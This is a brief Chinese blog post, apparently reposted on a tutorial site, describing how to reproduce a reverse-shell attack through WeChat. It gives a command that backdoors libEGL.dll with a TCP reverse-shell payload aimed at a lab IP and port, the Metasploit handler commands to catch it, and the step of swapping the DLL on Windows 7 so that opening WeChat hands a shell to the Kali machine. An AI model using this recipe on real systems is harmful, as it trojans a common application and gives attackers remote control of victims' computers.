2019.10.9wechat反弹shell复现

浪尽此生 提交于 2019-12-03 01:26:48

 

./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.106.137

 

 

 

 

 

 

msfconsle 打开msf

 msf

use exploit/multi/handler

 

 

 

set payload windows/shell_reverse_tcp

 

 

 

show options 查看配置

 

 

 

set lhost lport

 

 

 

 

exploit

 

 

 

windows7 替换dll文件,打开微信

kali 接收到反弹的shell

 

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!